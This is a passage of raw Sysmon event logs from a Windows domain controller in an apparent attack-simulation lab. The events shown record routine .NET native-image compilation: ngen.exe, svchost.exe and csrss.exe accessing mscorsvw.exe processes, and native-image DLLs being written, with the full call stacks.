indows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008166Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:20.306{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-921C-6005-EA03-00000000A301}3624C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008165Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:20.290{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-921C-6005-EA03-00000000A301}3624C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008164Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:20.290{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-921C-6005-EA03-00000000A301}3624C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008163Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:50:20.243{59A5CD1D-921C-6005-E903-00000000A301}3692C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\e6c-0\PresentationFramework-SystemDrawing.dll2021-01-18 13:50:20.243 10341000x80000000000000008162Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:20.103{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-921C-6005-E903-00000000A301}3692C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008161Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:20.087{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-921C-6005-E903-00000000A301}3692C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008160Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:20.087{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-921C-6005-E903-00000000A301}3692C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008159Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:20.056{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-921C-6005-E803-00000000A301}4092C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008158Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:20.040{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-921C-6005-E803-00000000A301}4092C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008157Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:20.040{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-921C-6005-E803-00000000A301}4092C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008204Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:21.884{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-921D-6005-F503-00000000A301}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008203Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:21.868{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-921D-6005-F503-00000000A301}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008202Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:21.868{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-921D-6005-F503-00000000A301}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008201Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:21.775{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-921D-6005-F403-00000000A301}2816C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008200Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:21.759{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-921D-6005-F403-00000000A301}2816C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008199Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:21.759{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-921D-6005-F403-00000000A301}2816C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008198Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:50:21.697{59A5CD1D-921D-6005-F303-00000000A301}3048C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\be8-0\PresentationFramework.Classic.dll2021-01-18 13:50:21.697 10341000x80000000000000008197Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:21.525{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-921D-6005-F303-00000000A301}3048C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008196Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:21.509{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-921D-6005-F303-00000000A301}3048C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008195Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:21.509{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-921D-6005-F303-00000000A301}3048C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008194Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:21.446{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-921D-6005-F203-00000000A301}740C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008193Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:21.431{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-921D-6005-F203-00000000A301}740C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008192Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:21.431{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-921D-6005-F203-00000000A301}740C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008191Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:50:21.384{59A5CD1D-921D-6005-F103-00000000A301}3500C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\dac-0\PresentationFramework.AeroLite.dll2021-01-18 13:50:21.384 10341000x80000000000000008190Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:21.243{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-921D-6005-F103-00000000A301}3500C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008189Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:21.228{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-921D-6005-F103-00000000A301}3500C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 